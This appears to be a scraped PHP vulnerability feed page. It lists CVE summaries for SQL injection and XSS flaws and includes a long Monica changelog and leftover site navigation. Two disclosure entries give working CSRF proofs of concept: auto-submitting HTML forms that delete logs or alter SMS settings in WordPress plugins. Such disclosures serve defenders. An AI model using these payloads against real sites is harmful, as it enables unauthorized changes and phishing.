Emlog version pro2.1.14 was discovered to contain a SQL injection vulnerability via the uid parameter at /admin/media.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-41623: wuhaozhe-s-CVE/CVE-2023-41623 at main · GhostBalladw/wuhaozhe-s-CVE

XunRuiCMS v4.5.5 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /admin.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-49490: XunRuiCMS-V4.5.5存在反射型XSS漏洞 · Issue #2 · dayrui/xunruicms

DedeCMS v5.7.111 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component select_media_post_wangEditor.php.

织梦 (DedeCMS) 官方网站 - 内容管理系统 - 上海卓卓网络科技有限公司

021-37788569

CVE-2023-49494: 织梦 (DedeCMS) 官方网站 - 内容管理系统

WordPress Contact Form to Any API plugin versions 1.1.6 and below suffer from a cross site request forgery vulnerability.

    # Exploit Title: WP Plugins Contact Form to Any API <= 1.1.6 - CSRF# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/# Vendor Homepage: https://www.itpathsolutions.com/# Version: 1.1.6# Tested on: Windows, Linux# CVE: CVE-2023-47871# Product DescriptionContact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.# Vulnerability overviewThe Wordpress plugins Contact Form to Any API <= 1.1.6 is vulnerable to Cross-Site Request Forgery in the Delete All Log function. This vulnerability could lead to unauthorized deletion of API Logs.# Proof of Concept<html><body><form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST"><input type="hidden" name="action" value="cf7_to_any_api_bulk_log_delete" /><input type="submit" value="Submit request" /></form><script>history.pushState('', '', '/');document.forms[0].submit();</script></body></html># RecommendationUpgrade to version 1.1.7

WordPress Contact Form To Any API 1.1.6 Cross Site Request Forgery

WordPress TextMe SMS plugin versions 1.9.0 and below suffer from a cross site request forgery vulnerability.

    # Exploit Title: WP Plugins TextMe SMS <= 1.9.0 - CSRF# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/textme-sms-integration/# Version: 1.9.0# Tested on: Windows, Linux# CVE: CVE-2023-48287# Product DescriptionThis plugin allows you to send SMS messages from your WordPress dashboard to the site owner or to your end users.# Vulnerability overviewThe Wordpress plugins TextMe SMS <= 1.9.0 is vulnerable to Cross-Site Request Forgery in the Settings function (Account details and Contact Form 7 Events). This could allow unauthenticated users to trick authenticated users to unintentionally modify the account details and contact form 7 events. This could lead to sensitive data leakage as well as phishing attacks. # Proof of Concept<html>  <body>    <form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST">      <input type="hidden" name="action" value="tetxme_update_option_page" />      <input type="hidden" name="data" value="textme_cf7=1&textme_cf7_user=1&textme_cf7_phone_field=0123456789&textme_cf7_user_content=SMS%20Phishing%20Sample" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html># RecommendationUpgrade to version 1.9.1

WordPress TextMe SMS 1.9.0 Cross Site Request Forgery

Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group.

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user.

**v5.0.0-beta.3**

**5.0.0-beta.3 (2023-10-29)****Bug Fixes**

*   add doctrine/dbal (#6817) (67a3acf)
*   correct ordering of contacts based on preferred displaying of names (#6962) (a46e92b)
*   default template cant be deleted (#6911) (eef206d)
*   fix Dockerfile (#6966) (452f59f)
*   fix locale in DatePicker (#6958) (e6157e7)
*   fix quick facts not being able to be saved (#6912) (b6b78e5)
*   fix sync\_tokens id table change (#6801) (60bdd08)
*   fix syntax error (#6957) (1b351e4)
*   fix uploadcare (#6942) (e9c4f9d)

**Features**

*   add logs for addressbook subscriptions (#6841) (094916d)
*   add monica:getversion command (#6965) (cd1b699)
*   add more vcard exports (#6878) (457081c)
*   add webauthn cookie when registering a new key (#6952) (142de32)
*   download one contact as vcard (#6747) (dd27398)
*   implement DAV client subscriptions (#6751) (2286e79)
*   implement Dav for groups (#6799) (b9783c6)
*   update langs and monica:localize command. Add 3 new languages. (#6917) (2fe7abc)

**v5.0.0-beta.2**

**5.0.0-beta.2 (2023-07-08)****Features**

*   add instance administrator (#6670) (ab3f380)
*   improve telegram setup workflow (#6734) (9ee07fb)

**Bug Fixes**

*   fix AddPostToSliceOfLife (#6681) (7c45d0d)
*   fix address image show (#6672) (ec3a44d)
*   fix addresses report list (#6725) (9c86677)
*   fix basic auth with token (#6673) (fab6c32)
*   fix call reasons (#6686) (ba06e85)
*   fix contact selector (#6680) (05c1333)
*   fix empty useForm() (#6671) (06851c9)
*   fix help links (#6727) (63574d1)
*   fix important date form (#6722) (46f4713)
*   fix ModuleFamilySummaryViewHelper (#6682) (7e77bea)
*   fix sentry integration and some slight errors (#6651) (d94c4ec)
*   fix setting a locale (#6721) (ddcb6e2)
*   fix some vue errors (#6685) (00548f8)
*   fix useForm (#6724) (d356688)
*   fix vue errors (#6707) (c69297f)
*   fix vue refs targets (#6675) (133e426)
*   fix vue refs targets (again) (#6676) (7b8997c)

**v5.0.0-beta.1**

**5.0.0-beta.1 (2023-06-10)**

First pre-release of chandler.  
See https://www.monicahq.com/blog/chandler-is-in-beta

**Bug Fixes**

*   bug fix on loan (monicahq/chandler#85) (bfe5ebe)
*   fix sortByCollator collection macro return keys (monicahq/chandler#556) (c3605ba)
*   fix address pivot (monicahq/chandler#419) (59924a2)
*   fix app\_version warnings (monicahq/chandler#411) (b9e32e9)
*   fix avatar not showing on reminder list (monicahq/chandler#229) (3d9cc3b)
*   fix avatar not uploaded in tabs (5c98f0c)
*   fix avatars here and there (monicahq/chandler#180) (438782f)
*   fix batch of reminders (monicahq/chandler#402) (a23da58)
*   fix batch of scheduled reminders (monicahq/chandler#401) (6a0d603)
*   fix cities blank state (monicahq/chandler#473) (9d2d103)
*   fix contact being clickable when choosing a contact (monicahq/chandler#398) (79f8b9c), closes monicahq/chandler#395
*   fix contact information without a protocol (monicahq/chandler#347) (e53b7ac)
*   fix contacts not being displayed (monicahq/chandler#470) (f7e8101)
*   fix cron again (monicahq/chandler#403) (50c98da)
*   fix dates not being saved (monicahq/chandler#76) (5df1726)
*   fix destroy file (monicahq/chandler#488) (5234096)
*   fix documentation links (monicahq/chandler#264) (2850688)
*   fix due tasks not being displayed on dashboard (monicahq/chandler#351) (ac1a724)
*   fix edit reminder (monicahq/chandler#152) (0759d58)
*   fix emojis on windows (monicahq/chandler#483) (b8b5950)
*   fix empty div showing when no tasks on dashboard (monicahq/chandler#379) (4752f68)
*   fix errors handle (monicahq/chandler#487) (8e2d5f8)
*   fix family summary (monicahq/chandler#265) (478d574)
*   fix favicon url (monicahq/chandler#247) (7230c5d)
*   fix flash emit (monicahq/chandler#389) (03f332c)
*   fix french translation (monicahq/chandler#524) (a7e2302)
*   fix generating api doc (monicahq/chandler#360) (2e11c10)
*   fix i18n for contact selector (monicahq/chandler#489) (2324f87)
*   fix i18n plural forms (monicahq/chandler#486) (721abb9)
*   fix important date type cant be null (monicahq/chandler#397) (6e9362f), closes monicahq/chandler#377
*   fix inconsistency in wording (monicahq/chandler#485) (24786cd)
*   fix life event modal not reset upon save (monicahq/chandler#510) (c791202)
*   fix meilisearch indexes import (monicahq/chandler#378) (55b4bbb)
*   fix memcache fortrabbit integration (monicahq/chandler#372) (8bcd595)
*   fix mixin added for testing (monicahq/chandler#355) (bc6b273)
*   fix months discrimination (monicahq/chandler#560) (1c8e84e)
*   fix notifications looping when processing the batch (monicahq/chandler#392) (dd6d45f), closes monicahq/chandler#390 monicahq/chandler#391
*   fix password saving at registration (monicahq/chandler#306) (88e5502)
*   fix reminders (monicahq/chandler#154) (9227a1a)
*   fix reminders one more time (monicahq/chandler#405) (bf4a138)
*   fix scout config for groups (monicahq/chandler#374) (070503e)
*   fix scribe generate (monicahq/chandler#310) (df63469)
*   fix scribe generate on docker image (monicahq/chandler#309) (74ccb06)
*   fix search with scout database (monicahq/chandler#223) (62978fa)
*   fix setup and dummy in case meilisearch not activated (monicahq/chandler#185) (6a85bca)
*   fix signup form not working (monicahq/chandler#221) (d291bbe)
*   fix socialite integration (monicahq/chandler#554) (2fddbe1)
*   fix suffix label (\[monicahq/chandler#394\](https://github.com/...

**v4.0.0**

**4.0.0 (2023-01-30)****⚠ BREAKING CHANGES**

*   switch to php 8.1+ dependency (#6250)
*   drop php 7.4 support (#6246)

**Features**

*   add DB\_TESTING\_PORT in database config (#6201) (fefa799)
*   add disallow in robots.txt (#6268) (be2e280)
*   add name to user resource (#6174) (8465803)
*   check male translation and fall back to generic (#6039) (4ba9062)
*   drop php 7.4 support (#6246) (84d0232)
*   focus tags input box (#6392) (2d75053)
*   load more activities (#5973) (117fe19)
*   switch to php 8.1+ dependency (#6250) (6a7f49f)

**Bug Fixes**

*   allow configuring port for test database (#6236) (aeffb71), closes #6200
*   allow empty completed\_at task date (#6025) (d4504e3)
*   change APP\_TRUST\_PROXIES to APP\_TRUSTED\_PROXIES (#6095) (5f63bed)
*   Continuously pressing enter shows empty tags (#6314) (2386096), closes #6235
*   fix avatar not being loaded on dashboard (#6224) (7c8105c)
*   fix blurry modals from sweet-modal-vue (#6026) (4cc1d8f)
*   fix Journal sidebar width on mobile (#6027) (d690bf6)
*   fix laravel cloudflare proxy (#6264) (d0b50fe)
*   life event creation with unknown month/day (#6046) (d81123b)
*   only include real contacts in carddav sync (#6014) (626f078)
*   **php8.1:** deprecated trim with null value (#6374) (b4c1c03)
*   skip version check if current version is empty (#6137) (4e1e4ee)
*   typo in french translation of nephew (#6074) (ad11e01)
*   vcard bday export format with unknown year (#6087) (f0db671)

**v3.7.0**

**v3.6.1**

**v3.6.0**

**3.6.0 (2022-01-11)****Features**

*   activate Norwegian and Russian languages (#5856) (8bdccbb)
*   add contact soft delete and prunable (#5826) (6f887df)
*   add reminders/upcoming API (#5783) (a3e9b79)
*   export data as json format (#4779) (8c627a2)
*   implement laravel password strength (#5821) (8295be3)
*   improve reliability of pingversion (#5723) (0c791f6)
*   order introductions contact list by first and last name (#5102) (6ff0738)
*   quick add with email (#5182) (80001fc)
*   re-activate adorable avatars with permanent solution (#5872) (ccf6d4f)
*   sync carddav delete contact requests (#5835) (30d97f9)

**Bug Fixes**

*   add link to reminders endpoint at api root (#5801) (337367a)
*   fix Date display with timezone (#5825) (d73e3c4)
*   version display on heroku (#5860) (0cf965f)

**v3.5.0**

**v3.4.0**

**3.4.0 (2021-10-31)****Features**

*   add dependencies node and yarn in Dockerfile (#5635) (48726b5)
*   added URLs to be exported in vCards. (#5609) (38429a2)
*   get weather from weatherapi (#5668) (d19b6ad)
*   retry get gps coordinate when rate limited second (#5615) (8eed44e)
*   searchable contacts on introductions form (#5632) (cc05552)
*   update last called attribute (#5614) (83e1d68)

**Bug Fixes**

*   fix carddav addressbook add (#5660) (ac44cfb)
*   fix creating default gender (#5607) (6c5ac48)
*   fix distant contact etag handle (#5605) (1da427f)
*   fix duplicate reminders on dashboard (#5569) (bb97115)
*   fix edit an activity with a category (#5661) (9128db8)
*   fix gift api without passport (#5664) (7939a5f)
*   fix import table layout (#5662) (cd138c8)
*   fix vcard company import (#5616) (0dd4b23)

**v3.3.1**

CVE-2023-50465: Releases · monicahq/monica

A vulnerability, which was classified as critical, has been found in Campcodes Web-Based Student Clearance System 1.0. This issue affects some unknown processing of the file /libsystem/login.php. The manipulation of the argument student leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247367.

CVE-2023-6659

A vulnerability classified as critical was found in SourceCodester Simple Student Attendance System 1.0. This vulnerability affects unknown code of the file ajax-api.php?action=save_attendance. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-247366 is the identifier assigned to this vulnerability.

CVE-2023-6658

A vulnerability classified as critical has been found in SourceCodester Simple Student Attendance System 1.0. This affects an unknown part of the file /modals/student_form.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-247365 was assigned to this vulnerability.

Tag

#php